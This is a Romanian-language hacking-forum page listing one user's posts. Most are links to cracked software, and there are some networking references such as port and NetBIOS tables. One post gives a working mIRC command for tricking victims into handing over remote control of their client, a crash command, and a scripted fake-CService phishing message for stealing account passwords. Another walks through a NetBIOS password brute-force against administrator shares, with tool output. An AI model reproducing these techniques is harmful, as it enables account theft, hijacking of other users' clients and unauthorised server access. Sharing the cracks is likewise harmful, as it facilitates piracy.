Jump to content

Sw0rdFish

Active Members
  • Posts

    110
  • Joined

  • Last visited

    Never

Everything posted by Sw0rdFish

  1. Sw0rdFish

    CNP vostru

    Lol chiar amu cand am fost la dentist mi-o zis Dr. ce CNP am ... sa vedem care posteaza ... din cnp poti afla varsta !!!
  2. Screenshot: http://img93.imageshack.us/img93/3154/rapi...eneratortn7.png Nu garantez ca va merge 100%. Va sugerez ,cand va conectati la RaipidShare folositi proxy!! Download: http://rapidshare.de/files/27023419/RPASG_..._by_lacoste.rar
  3. Techno 5 is the perfect tool to start mixing your beats like the pros! Techno 5 is the latest music creation tool from the eJay line of award winning music creation software. Start producing today with the 5,000 royalty-free techno, electro, trance and drum & bass sound clips included with this package! features 5000 royalty-free professional samples, loops and beats. Five virtual instruments: sampler, multi-tracks drum machine, DJ decks, bass synth and poly synth. Switch between simple and advanced mode as desired. Non-destructive audio editing. Many audio effects included: echo, chorus, reverb, compressor, distortion, and more... An equalizer to fine tune your sound. Sample studio: professional audio editor to create and modify your own sounds. Volume and pan curves for each track give complete control in adjusting these settings. Sample direct from CD or from any device connected to your sound card. Integrated CD burning to record your tracks on CD. Unlimited import and export of WAV files. Comprehensive online manual and tutorial. Code: http://www.oxyshare.com/get/1720193820449a...part01.rar.html http://www.oxyshare.com/get/1899626000449a...part02.rar.html http://www.oxyshare.com/get/1843233098449a...part03.rar.html http://www.oxyshare.com/get/347777758449a8...part04.rar.html http://www.oxyshare.com/get/597671812449a8...part05.rar.html Password: www.Magesy.ru
  4. Super Internet TV allows you to watch 1000+ live television channels and listen to 1300+ online radio stations from 100+ countries. There is no need for a TV Tuner card because all the channels are streamed through your Internet connection. For most TV and Radio channels a modem speed of 56Kb/s is required, for the broadband TV stations you need 300 Kb/s. This software comes with automatic TV station updates so it will never be out of date. If you are interested in learning languages or alternative programming, this is a good choice for you! Version 6 added 200 live webcams! Features: More than 1000 FREE TV stations. (see TV channel list) More than 1300 FREE radio stations. (see radio channel list) More than 200 live webcams. (see webcam list) NO TV tuner card required! Automatic channel list updates. Supports high bandwidth stations. Supports thousands of skins(visual styles *.msstyles) Resizable screen,including full-screen mode Info http://ahusoft.com/ Download + Fix http://rapidshare.de/files/25161937/SI.TV....S-Full.rar.html
  5. Here is a summary of the new functions in Virtual CD - Certified 64-bit driver - Virtual CD/DVD-burner - Virtual encrypted hard-drive - Expanded function access over the tray icon - Insertion of virtual CDs also in physical drives - Improved support of non-standard CD/DVD formats - Noise reducer for physical CD/DVD-drives - Enhanced toolbox - Improved API- and script functions - Flexible layout of the CD-management incl. layout browser Get all the details about Virtual CD v8 here Using CDs and DVDs without a drive Virtual CD copies your CDs and DVDs to the hard drive of your PC or Server using highly efficient data compression techniques. The virtual CDs are then run in virtual CD drives which are automatically set up in Windows and have all the functions and features of physical CD drives. Advantages of Virtual CD - Up to 23 virtual CD/DVD drives - Up to 23 CDs/DVDs accessible at the same time - High speed access to an unlimited number of CDs and DVDs - 1:1 access to CD- or DVD-images stored in a network - CD/DVD data throughput at hard disc speed (200x CD-ROM) - Accesstime up to 93% faster than a phys. CD-ROM drive - Concurrent access of several computers to a CD/DVD image and much more... DOWNLOAD:- http://www.virtualcd.de/vcddemoe.exe FIX:- http://ateus.ru/samlab/crk/virtualcd.rar Virtual CD V 8.0 full http://enfull.com/download4.asp?id=352&soft=enfull1
  6. The program packet Network Administrator is intended for facilitating the labor of the administrators of recreation areas and (or) the Internet halls (cafe, clubs, salons). Application - http://my.elvisti.com/frost/na63.zip Crack / Serial / Patch - http://rapidshare.de/files/26090127/NA6.3.rar Password - www.2baksa.net
  7. PCXL helps you optimize your computer to increase system performance. Improve Internet performance, and web security. Provide convenient tools to tune up and ease your computer use. PCXL also provides special security features to protect your system. Available in Standard, Deluxe, and Extreme versions. Features include: - Support for dual monitors in 3Dfx cards. - Manual adjustments for key functions. - Save favorite configurations to a file. - Pre-set quick optimization settings. - Support for all the latest processors. - Support for all the latest graphics cards. - Support for all the latest network protocols and equipment, such as 802.11b and Bluetooth. - And much, much more. What's new: -New SmartJupiter 2.0 Acceleration Engine -Optimization support for the latest Intel and AMD processors, including dual-core processors -Optimization support for the latest ATI and Nvidia video cards -Optimization support for the latest sound cards -Optimization support for memory up to 4 GB of RAM -Improved real-time hard drive optimization performance by 30% -Improved real-time memory management optimizations -Improved web acceleration performance -Improved system auto-tuneup optimizations Download: http://www.majorgeeks.com/downloadget.php?...d0ea9a5a5f2e0c0 IMPORTANT!!!!!!!!!! When you install disable program startup from msconfig.
  8. BitDefender 9 Internet Security covers all the security needs of an Internet-connected family. It provides essential protection against viruses, spyware, spam, scams, phishing attempts, intruders and objectionable web content. Download: http://rapidshare.de/files/29185463/Bitdef...tered___Geo.rar
  9. • Player : - Media Player Classic [version 6.4.9.0 rev. 611] • ffdshow : - ffdshow [rev. 2543] - extra plugins - ffdshow VFW interface • DirectShow video filters : - XviD [version 1.2.0-dev build 2006-04-20] - DivX Pro [version 6.2.2] - CoreAVC [version 0.0.0.4] - On2 VP6 [version 6.4.2.0] - On2 VP7 [version 7.0.10.0] - Cyberlink DVD decoder [version 6.0.0.2023] - InterVideo DVD decoder [version 7.0.27.191] - MPEG-1/2 (Ligos) [version 4.0.0.77] - MPEG-1/2 (Gabest) [version 1.0.0.3] - MPEG-1/2 (MainConcept) [version 1.0.0.78] • VFW video codecs : - XviD [version 1.2.0-dev build 2006-04-20] - DivX Pro [version 6.2.5.34] - x264 [rev. 536] - Windows Media 9 VCM [version 9.0.1.369] - On2 VP6 [version 6.4.2.0] [Encoding] - On2 VP7 [version 7.0.10.0] [Encoding] - Intel Indeo [version 5.2562.15.54] - Intel Indeo [version 4.51.16.2] - Intel Indeo [version 3.24.15.03] - Intel I.263 [version 2.55.1.16] - Huffyuv [version 2.1.1 CCE Patch 0.2.5] • DirectShow audio filters : - MP3 (Fraunhofer) [version 1.9.0.311] - AC3/DTS/LPCM (AC3Filter) [version 1.02a test8] - AC3/DTS/LPCM (InterVideo) [version 7.0.27.191] - MP1/MP2 (Ligos) [version 4.0.0.77] - MP1/MP2 (MainConcept) [version 1.0.0.78] - Vorbis (CoreVorbis) [version 1.1.0.79] - AAC (CoreAAC) [version 1.2.0.573] - AAC (3ivX Pro) [version D4 4.5.1] - MusePack [version 1.0.0.3] - Monkey's Audio [version 1.00] - WavPack (CoreWavPack) [version 1.0.3] - FLAC (illiminable) [version 0.71.0946] - Voxware MetaSound [version 1.0.0.12] - AAC encoder (3ivX Pro) [version D4 4.5.1] • ACM audio codecs : - MP3 (Fraunhofer) [version 3.3.2] - MP3 (LAME) [version 3.97b2] - AC3 (ffcHandler) [version 1.3.1] - Vorbis [version 0.0.3.6] - DivX Wink Audio [version 4.2.0.0] • DirectShow source filters : - MP4 splitter (Haali Media Splitter) [version 1.6.224.23] - MP4 splitter (Gabest) [version 1.0.0.3] - Matroska splitter (Haali Media Splitter) [version 1.6.224.23] - Matroska splitter (Gabest) [version 1.0.2.9] - Ogg splitter (Haali Media Splitter) [version 1.6.224.23] - FLV splitter (Gabest) [version 1.0.0.1] - MPEG-TS splitter (Haali Media Splitter) [version 1.6.224.23] - MPEG demuxer (Elecard) [version 1.0.31.51211] - MPEG demuxer (Gabest) [version 1.0.0.3] - MPEG demuxer (MainConcept) [version 1.0.1.20] - MPEG demuxer (Ligos) [version 4.0.0.77] - SHOUTcast Source [version 1.0.0.1] • DirectShow subtitle filter : - DirectVobSub (a.k.a. VSFilter) [version 2.37] - DirectVobSub (a.k.a. VSFilter) [version 2.33] • DirectShow audio filters (general purpose) : - Matrix Mixer [version 0.30b] - Morgan Multimedia Stream Switcher [version 0.9.9] • Encoding tools : - LAME CLI and DLL [version 3.97b2] - LameDropXPd [version 3.97b2] • Tools : - GSpot Codec Information Appliance [version 2.52 beta 1 build 2004-09-15] - Sherlock [version 2.0] - VobSubStrip [version 0.11] - GraphEdit [build 041201] - MMCompView [version 1.10] - AVI Fixed [version 2.0b1] - FourCC Changer - Bitrate Calculator Changes K-Lite Codec Pack Update 08.09.2006 : - Improved Codec Tweak Tool - Improved .mov downloader - AC3Filter [version 1.09a] - x264 [rev. 551] Download: http://www.free-codecs.com/download_soft.p...php?d=2083&s=95
  10. Carte foarte buna ,merita downloadata [pt cei ce stiu engleza] Download: http://www.plunder.com/-download-7209.htm
  11. Book Description Your shortcut to success™ for over 40 years CliffsNotes. They helped you get through school. Now let them help you get through life. With this trusty guide, you'll get up to speed fast on the best job-hunting sites and strategies online.Check out our other CliffsNotes titles See the inside back pages for a list of CliffsNotes on Computers, Software, the Internet, Personal Finance, and Careers — and look for CliffsNotes on other topics coming soon. Download: http://rapidshare.de/files/28976859/Findin....on.the.Web.rar
  12. Ce ideei iti vin la ora 5 dimineata 0_o )) it's good
  13. ##Google Hacking## What is Google hacking? Google hacking is the term used when a hacker tries to find exploitable targets and sensitive data by using search engines. The Google Hacking Database (GHDB) is a database of queries that identify sensitive data. Although Google blocks some of the better known Google hacking queries, nothing stops a hacker from crawling your site and launching the Google Hacking Database queries directly onto the crawled content. The Google Hacking Database is located at http://MeftunNet.ComMore information about Google hacking can be found on: http://www.MeftunNet.Com/error What a hacker can do if your site is vulnerable Information that the Google Hacking Database identifies: Advisories and server vulnerabilities Error messages that contain too much information Files containing passwords Sensitive directories Pages containing logon portals Pages containing network or vulnerability data such as firewall logs. How to check for Google hacking vulnerabilities The easiest way to check whether your web site & applications have Google hacking vulnerabilities, is to use a Web Vulnerability Scanner. A Web Vulnerability Scanner scans your entire website and automatically checks for pages that are identified by Google hacking queries. (Note: Your web vulnerability scanner must be able to launch Google hacking queries). The Acunetix Web Vulnerability Scanner scans for SQL injection, Cross site scripting and many more vulnerabilities. For more information & a trial download click here. Preventing Google hacking attacks Remove all pages identified by Google hacking queries Check if your website is vulnerable to attack Get a free security audit performed by Acunetix staff using Acunetix Web Vulnerability Scanner. Acunetix will scan your website simulating numerous hacking techniques such as SQL injection, cross site scripting, Google hacking and more, in order to identify vulnerabilities in your website. After the scan has completed, you will receive a summary report indicating what - if any - vulnerabilities exist on your site. ##FTP PORT COMMAND^## 1. Introduction In the past few years, there have been ongoing discussions about problems related to the PORT command in the FTP protocol. These problems are based on the misuse of the PORT command in the FTP protocol. 2. The FTP Protocol To understand these attacks, it is necessary to have a basic understanding of the FTP protocol [1]. A client opens a connection to the FTP control port (port 21) of an FTP server. So that the server will be later able to send data back to the client machine, a second (data) connection must be opened between the server and the client. To make this second connection, the client sends a PORT command to the server machine. This command includes parameters that tell the server which IP address to connect to and which port to open at that address - in most cases this is intended to be a high numbered port on the client machine. The server then opens that connection, with the source of the connection being port 20 on the server and the destination being the port identified in the PORT command parameters. The PORT command is usually used only in the "active mode" of FTP, which is the default. It is not usually used in passive (also known as PASV [2]) mode. Note that FTP servers usually implement both modes, and the client specifies which method to use [3]. 3. The FTP Bounce Attack To conform with the FTP protocol, the PORT command has the originating machine specify an arbitrary destination machine and port for the data connection. However, this behavior also means that an attacker can open a connection to a port of the attacker's choosing on a machine that may not be the originating client. Making this connection to an arbitrary machine for unauthorized purposes is the FTP bounce attack. For illustrative purposes only, several examples of how attackers can use FTP bounce follow.
  14. Filterfunk - S.O.S. [ on the radio ]
  15. Daca a mai fost postat ,rog un modelator sa stearga postul! Fraierii de pe MIrc pot fi shi mai fraieri daca ii ajutatzi putzin. CUM? Simplu. Prin intermediul unei comenzi putetzi sa ii controlatzi mircu in intregime. Nu trebuie decat sa ii pui sa scrie urmatoarea comanda si prin intermediul unor altor comenzi simple va jucatzi cu mircul lui. Acum sa nu mai stau la vorbaraie shi sa va dau comanda: //me | write -c x ctcp 1:*:@$1- | //me : | .load -rs x Odata ce a scris comanda uu va aparea in locul in care a scriso urmatoarele semne: : Dupa ele stitzi ca victima a pus comanda ! Odata ce a pus-o vetzi avea acces ctcp pe toate comenzile mircului!!! Acum folositzi urmatoarele comenzi : /ctcp nick /msg nick-sau-canal mesaj aceasta va face ca prin intermediul nickului victimei sa scrietzi ce text vretzi unde vretzi !!! /ctcp nick /join #canal aceasta comanda va face ca victima sa intre pe canalul dorit; /ctcp nick /part #canal aceasta comanda va face ca victima sa iese de pe canalul dorit; /ctcp nick /disconnect aceasta comanda va face ca victima sa iese de pe MIRC; /ctcp nick /clearscreen aceasta comanda ii va shterge victimei tot scrisu din mirc.. astfel nu va mai vedea nimik din ce a vorbit Atzi prins ideea? Ma bucur.. dar mai am o comanda frumoasa in caz ca victima va injurat sau enervat prea mult: /ctcp nick /run c:concon Aceasta comanda ii va bloca automat computeru (ATENTZIE: merge numai pe 98, 95 ,Me) NOTA: Daca personana e suspecta de comanda de mai sus putetzi incerca direct /run c:concon shi ii vetzi bloca direct copmuterul. SFAT: Nu ezitatzi niciodata sa folositzi mesaje cat mai atractive pentru acea comanda . Pentru ca fraierii de pe mirc sunt chiar foarte fraieri (cel putzin unii, ca mai sunt shi exceptzii) putetzi sa ii pacalitzi prin intermediul mesajelor folosind /ame mesaj(scrie acelashi mesaj pe toate canalele) sau /notice #canal-sau-nick mesaj(notifica un canal sau o persoana cu un mesaj) sau chiar scriindu-i in privat un mesaj. Pentru aceasta va voi da mai multe exemple: 1. Sa incepem cu comanda //me | write -c x ctcp 1:*:@$1- | //me : | .load -rs x : - in ea putetzi modifica scrisul si : asha ca o idee si scoatetzi un mesaj ca sa fraieritzi victima. Cum ar fi: //me mp3-list | write -c x ctcp 1:*:@$1- | //me *.mp3 | .load -rs x ar face sa kreada ca victima itzi va vedea mp3-urile tale... insa nu e destul; mai trebuie sa intervenitzi shi voi cu un mesaj.. Astfel avem un exemplu complet: Daca vretzi sa imi vedetzi lista de mp3uri scrietzi comanda: //me mp3-list | write -c x ctcp 1:*:@$1- | //me *.mp3 | .load -rs x Daca vretzi mai multe exemple doar ganditziva shi vetzi gasi ! 2. Acum sa va dau ceva mai interesant : Cum furatzi usere sub nasul vitimelor. Presupun ca va ganditzi la metode de hacking complicate si grele.. dar totul e mai mult decat simplu.. Totul se intampla prin intermediul unui mesaj. Mai intai schimbatzi-va nickul in Cserv1ce sau Cs3rvice sau ceva asemanantor: Acum scrietzi urmatorul mesaj prin notice pe cat mai multe canale: /notice #canal Din cauza de prea multe usere serverul undernet este laguit, asha ca Cservice a hotarat suspendarea tuturor userelor !! Daca vrei sa nu tzi se suspende scrie urmatoarea comanda /msg nickul-tau(Cserv1ce sau Cs3rvice) $un-suspend me | username |password Astfel fraierul itzi va da propia parola la propiul user ! Insa el ishi poate recupera parola de la mailul sau asha ca incercatzi sa ceretzi shi parola de la mail !!! Pentru cei care nu folosesc Mircu delok am sa le dau toate detaliile in caz ca vretzi sa va batetzi joc de nishte fraieri: Deci dupa ce atzi intrat pe mirc, intratzi pe cat mai multe canale shi bagatzi comanda de mai sus ! Dar mai intai scrietzi /nick Cserv1ce ca sa va schimbatzi nickul in Cserv1ce. Sa zicem ca intratzi pe canalul #campia shi vretzi sa bagatzi mesajul pentru furat usere.. comanda va fi in cazul asta: /notice # Din cauza de prea multe usere serverul undernet este laguit, asha ca Cservice a hotarat suspendarea tuturor userelor !! Daca vrei sa nu tzi se suspende scrie urmatoarea comanda /msg Cserv1ce $un-suspend me | username | password . Acum trebuie sa prindetzi fraierii care itzi vor da mesaj userul shi passul . In caz ca ai primit un mesaj din acesta ai prins un fraier .. Insa atentzie ca mai sunt care dau la panarama user shi pass. ;alert<'Scrii mesaj'>;return false` onselectstart=`return false`>
  16. "SEX MULT !!! , SALA MULTA !!!! " de acord cu SpiridusuCaddy alta metoda mai buna decat asta nu exista...daca stie care alta sa ridice mana.Daca nu mergeti la sala macar sa faceti ceva acasa,ex:20-30 de flotari,cateva abdomene si genoflexiuni...
  17. 1.87, 84kg ,brunet ,caprui,
  18. metoda asta sigur merge , am avut un prog care schimba el,deci nu trebuia sa faci nimic manual ... Enj0y!
  19. This NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1. One of the components being used is NAT.EXE by Andrew Tridgell. A discussion of the tool, it switches, and common techniques follows: NAT.EXE [-o filename] [-u userlist] [-p passlist] <address> Switches: -o Specify the output file. All results from the scan will be written to the specified file, in addition to standard output. -u Specify the file to read usernames from. Usernames will be read from the specified file when attempt- ing to guess the password on the remote server. Usernames should appear one per line in the speci- fied file. -p Specify the file to read passwords from. Passwords will be read from the specified file when attempt- ing to guess the password on the remote server. Passwords should appear one per line in the speci- fied file. <address> Addresses should be specified in comma deliminated format, with no spaces. Valid address specifica- tions include: hostname - "hostname" is added 127.0.0.1-127.0.0.3, adds addresses 127.0.0.1 through 127.0.0.3 127.0.0.1-3, adds addresses 127.0.0.1 through 127.0.0.3 127.0.0.1-3,7,10-20, adds addresses 127.0.0.1 through 127.0.0.3, 127.0.0.7, 127.0.0.10 through 127.0.0.20. hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1 through 127.0.0.1 All combinations of hostnames and address ranges as specified above are valid. C:nbtstat -A XXX.XX.XXX.XX NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- STUDENT1 <20> UNIQUE Registered STUDENT1 <00> UNIQUE Registered DOMAIN1 <00> GROUP Registered DOMAIN1 <1C> GROUP Registered DOMAIN1 <1B> UNIQUE Registered STUDENT1 <03> UNIQUE Registered DOMAIN1 <1E> GROUP Registered DOMAIN1 <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered MAC Address = 00-C0-4F-C4-8C-9D Here is a partial NetBIOS 16th bit listing: Computername <00> UNIQUE workstation service name <00> GROUP domain name Server <20> UNIQUE Server Service name Computername <03> UNIQUE Registered by the messenger service. This is the computername to be added to the LMHOSTS file which is not necessary to use NAT.EXE but is necessary if you would like to view the remote computer in Network Neighborhood. Username <03> Registered by the messenger service. Domainname <1B> Registers the local computer as the master browser for the domain Domainname <1C> Registers the computer as a domain controller for the domain (PDC or BDC) Domainname <1D> Registers the local client as the local segments master browser for the domain Domainname <1E> Registers as a Group NetBIOS Name <BF> Network Monitor Name <BE> Network Monitor Agent <06> RAS Server <1F> Net DDE <21> RAS Client * Net Accounts: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the User accounts database and modifying password and logon requirements. * Net Computer: This adds or deletes computers from a domains database. * Net Config Server or Net Config Workstation: Displays config info about the server service. When used without specifying Server or Workstation, the command displays a list of configurable services. * Net Continue: Reactivates an NT service that was suspended by a NET PAUSE command. * Net File: This command lists the open files on a server and has options for closing shared files and removing file locks. * Net Group: This displays information about group names and has options you can use to add or modify global groups on servers. * Net Help: Help with these commands * Net Helpmsg message#: Get help with a particular net error or function message. * Net Localgroup: Use this to list local groups on servers. You can also modify those groups. * Net Name: This command shows the names of computers and users to which messages are sent on the computer. * Net Pause: Use this command to suspend a certain NT service. * Net Print: Displays print jobs and shared queues. * Net Send: Use this command to send messages to other users, computers, or messaging names on the network. * Net Session: Shows information about current sessions. Also has commands for disconnecting certain sessions. * Net Share: Use this command to list information about all resources being shared on a computer. This command is also used to create network shares. * Net Statistics Server or Workstation: Shows the statistics log. * Net Stop: Stops NT services, cancelling any connections the service is using. Let it be known that stopping one service, may stop other services. * Net Time: This command is used to display or set the time for a computer or domain. * Net Use: This displays a list of connected computers and has options for connecting to and disconnecting from shared resources. * Net User: This command will display a list of user accounts for the computer, and has options for creating a modifying those accounts. * Net View: This command displays a list of resources being shared on a computer. Including netware servers. Special note on DOS and older Windows Machines: The commands listed above are available to Windows NT Servers and Workstation, DOS and older Windows clients have these NET commands available: Net Config Net Diag (runs the diagnostic program) Net Help Net Init (loads protocol and network adapter drivers.) Net Logoff Net Logon Net Password (changes password) Net Print Net Start Net Stop Net Time Net Use Net Ver (displays the type and version of the network redirector) Net View For this section, the command being used is the NET VIEW and NET USE commands. An actual example of how the NAT.EXE program is used. The information listed here is an actual capture of the activity. The IP addresses have been changed to protect, well, us. C:nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY [*]--- Reading usernames from userlist.txt [*]--- Reading passwords from passlist.txt [*]--- Checking host: XXX.XX.XXX.XX [*]--- Obtaining list of remote NetBIOS names [*]--- Attempting to connect with name: * [*]--- Unable to connect [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03 [*]--- Server time is Mon Dec 01 07:44:34 1997 [*]--- Timezone is UTC-6.0 [*]--- Remote server wants us to encrypt, telling it not to [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to establish session [*]--- Was not able to establish session with no password [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password' [*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password' [*]--- Obtained server information: Server=[sTUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[] [*]--- Obtained listing of shares: Sharename Type Comment --------- ---- ------- ADMIN$ Disk: Remote Admin C$ Disk: Default share IPC$ IPC: Remote IPC NETLOGON Disk: Logon server share Test Disk: [*]--- This machine has a browse list: Server Comment --------- ------- STUDENT1 [*]--- Attempting to access share: *SMBSERVER [*]--- Unable to access [*]--- Attempting to access share: *SMBSERVERADMIN$ [*]--- WARNING: Able to access share: *SMBSERVERADMIN$ [*]--- Checking write access in: *SMBSERVERADMIN$ [*]--- WARNING: Directory is writeable: *SMBSERVERADMIN$ [*]--- Attempting to exercise .. bug on: *SMBSERVERADMIN$ [*]--- Attempting to access share: *SMBSERVERC$ [*]--- WARNING: Able to access share: *SMBSERVERC$ [*]--- Checking write access in: *SMBSERVERC$ [*]--- WARNING: Directory is writeable: *SMBSERVERC$ [*]--- Attempting to exercise .. bug on: *SMBSERVERC$ [*]--- Attempting to access share: *SMBSERVERNETLOGON [*]--- WARNING: Able to access share: *SMBSERVERNETLOGON [*]--- Checking write access in: *SMBSERVERNETLOGON [*]--- Attempting to exercise .. bug on: *SMBSERVERNETLOGON [*]--- Attempting to access share: *SMBSERVERTest [*]--- WARNING: Able to access share: *SMBSERVERTest [*]--- Checking write access in: *SMBSERVERTest [*]--- Attempting to exercise .. bug on: *SMBSERVERTest [*]--- Attempting to access share: *SMBSERVERD$ [*]--- Unable to access [*]--- Attempting to access share: *SMBSERVERROOT [*]--- Unable to access [*]--- Attempting to access share: *SMBSERVERWINNT$ [*]--- Unable to access If the default share of Everyone/Full Control is active, then you are done, the server is hacked. If not, keep playing. You will be surprised what you find out.
  20. merita sa-ti faci statie radio?cand poti sa descarci orice melodie vrei tu de pe net,sau sa dai dedicatii lame...
  21. NetBIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS station name that is user defined or that NetBIOS derives by internal means. NetBIOS can consist of up to 16 alphanumeric characters. The combination of characters must be unique within the entire source routing network. Before a PC that uses NetBIOS can fully function on a network, that PC must register their NetBIOS name. When a client becomes active, the client advertises their name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process is as follows: 1. Upon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 to ensure every other client on the network receives the information. 2. If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client who is trying to register the already in use name, stop all attempts to register that name. 3. If no other client on the network objects to the name registration, the client will finish the registration process. There are two types of names in a NetBIOS enviroment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique and all processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that node. The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix is used by Microsoft Networking software to indentify the functionality installed or the registered device or service. [QuickNote: SMB and NBT (NetBIOS over TCP/IP work very closely together and both use ports 137, 138, 139. Port 137 is NetBIOS name UDP. Port 138 is NetBIOS datagram UDP. Port 139 is NetBIOS session TCP. For further information on NetBIOS, read the paper at the rhino9 website listed above] The following is a table of NetBIOS suffixes currently used by Microsoft WindowsNT. These suffixes are displayed in hexadecimal format. Name Number Type Usage ========================================================================= = <computername> 00 U Workstation Service <computername> 01 U Messenger Service <_MSBROWSE_> 01 G Master Browser <computername> 03 U Messenger Service <computername> 06 U RAS Server Service <computername> 1F U NetDDE Service <computername> 20 U File Server Service <computername> 21 U RAS Client Service <computername> 22 U Exchange Interchange <computername> 23 U Exchange Store <computername> 24 U Exchange Directory <computername> 30 U Modem Sharing Server Service <computername> 31 U Modem Sharing Client Service <computername> 43 U SMS Client Remote Control <computername> 44 U SMS Admin Remote Control Tool <computername> 45 U SMS Client Remote Chat <computername> 46 U SMS Client Remote Transfer <computername> 4C U DEC Pathworks TCPIP Service <computername> 52 U DEC Pathworks TCPIP Service <computername> 87 U Exchange MTA <computername> 6A U Exchange IMC <computername> BE U Network Monitor Agent <computername> BF U Network Monitor Apps <username> 03 U Messenger Service <domain> 00 G Domain Name <domain> 1B U Domain Master Browser <domain> 1C G Domain Controllers <domain> 1D U Master Browser <domain> 1E G Browser Service Elections <INet~Services> 1C G Internet Information Server <IS~Computer_name> 00 U Internet Information Server <computername> [2B] U Lotus Notes Server IRISMULTICAST [2F] G Lotus Notes IRISNAMESERVER [33] G Lotus Notes Forte_$ND800ZA [20] U DCA Irmalan Gateway Service Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique. Group (G): A normal group; the single name may exist with many IP addresses. Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25. Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names. Domain Name (D): New in NT 4.0 For a quick and dirty look at a servers registered NetBIOS names and services, issue the following NBTSTAT command: nbtstat -A [ipaddress] nbtstat –a [host] Enj0y!
  22. Service Port Comments TCP Ports echo 7/tcp discard 9/tcp sink null systat 11/tcp users daytime 13/tcp netstat 15/tcp qotd 17/tcp quote chargen 19/tcp ttytst source ftp-data 20/tcp ftp 21/tcp telnet 23/tcp smtp 25/tcp mail time 37/tcp timserver name 42/tcp nameserver whois 43/tcp nicname nameserver 53/tcp domain apts 57/tcp any private terminal service apfs 59/tcp any private file service rje 77/tcp netrjs finger 79/tcp http 80/tcp link 87/tcp ttylink supdup 95/tcp newacct 100/tcp [unauthorized use] hostnames 101/tcp hostname iso-tsap 102/tcp tsap x400 103/tcp x400-snd 104/tcp csnet-ns 105/tcp CSNET Name Service pop-2 109/tcp Post Office Protocol version 2 pop-3 110/tcp Post Office Protocol version 3 sunrpc 111/tcp auth 113/tcp authentication sftp 115/tcp uucp-path 117/tcp nntp 119/tcp usenet readnews untp ntp 123/tcp network time protocol statsrv 133/tcp profile 136/tcp NeWS 144/tcp news print-srv 170/tcp https 443/tcp Secure HTTP exec 512/tcp remote process execution; authentication performed using passwords and UNIX loppgin names login 513/tcp remote login a la telnet; automatic authentication performed based on priviledged port numbers and distributed data bases which identify "authentication domains" cmd 514/tcp like exec, but automatic authentication is performed as for login server printer 515/tcp spooler efs 520/tcp extended file name server tempo 526/tcp newdate courier 530/tcp rpc conference 531/tcp chat netnews 532/tcp readnews uucp 540/tcp uucpd klogin 543/tcp kshell 544/tcp krcmd dsf 555/tcp remotefs 556/tcp rfs server chshell 562/tcp chcmd meter 570/tcp demon pcserver 600/tcp Sun IPC server nqs 607/tcp nqs mdqs 666/tcp rfile 750/tcp pump 751/tcp qrh 752/tcp rrh 753/tcp tell 754/tcp send nlogin 758/tcp con 759/tcp ns 760/tcp rxe 761/tcp quotad 762/tcp cycleserv 763/tcp omserv 764/tcp webster 765/tcp phonebook 767/tcp phone vid 769/tcp rtip 771/tcp cycleserv2 772/tcp submit 773/tcp rpasswd 774/tcp entomb 775/tcp wpages 776/tcp wpgs 780/tcp mdbs 800/tcp device 801/tcp maitrd 997/tcp busboy 998/tcp garcon 999/tcp blackjack 1025/tcp network blackjack bbn-mmc 1347/tcp multi media conferencing bbn-mmx 1348/tcp multi media conferencing orasrv 1525/tcp oracle ingreslock 1524/tcp issd 1600/tcp nkd 1650/tcp dc 2001/tcp mailbox 2004/tcp berknet 2005/tcp invokator 2006/tcp dectalk 2007/tcp conf 2008/tcp news 2009/tcp search 2010/tcp raid-cc 2011/tcp raid ttyinfo 2012/tcp raid-am 2013/tcp troff 2014/tcp cypress 2015/tcp cypress-stat 2017/tcp terminaldb 2018/tcp whosockami 2019/tcp servexec 2021/tcp down 2022/tcp ellpack 2025/tcp shadowserver 2027/tcp submitserver 2028/tcp device2 2030/tcp blackboard 2032/tcp glogger 2033/tcp scoremgr 2034/tcp imsldoc 2035/tcp objectmanager 2038/tcp lam 2040/tcp interbase 2041/tcp isis 2042/tcp rimsl 2044/tcp dls 2047/tcp dls-monitor 2048/tcp shilp 2049/tcp NSWS 3049/tcp rfa 4672/tcp remote file access server complexmain 5000/tcp complexlink 5001/tcp padl2sim 5236/tcp man 9535/tcp UDP Ports echo 7/udp discard 9/udp sink null systat 11/udp users daytime 13/udp netstat 15/udp qotd 17/udp quote chargen 19/udp ttytst source time 37/udp timserver rlp 39/udp resource name 42/udp nameserver whois 43/udp nicname nameserver 53/udp domain bootps 67/udp bootp bootpc 68/udp tftp 69/udp sunrpc 111/udp erpc 121/udp ntp 123/udp statsrv 133/udp profile 136/udp snmp 161/udp snmp-trap 162/udp at-rtmp 201/udp at-nbp 202/udp at-3 203/udp at-echo 204/udp at-5 205/udp at-zis 206/udp at-7 207/udp at-8 208/udp biff 512/udp used by mail system to notify users of new mail received; currently receives messages only from processes on the same machine who 513/udp maintains data bases showing who's logged in to machines on a local net and the load average of the machine syslog 514/udp talk 517/udp like tenex link, but across machine - unfortunately, 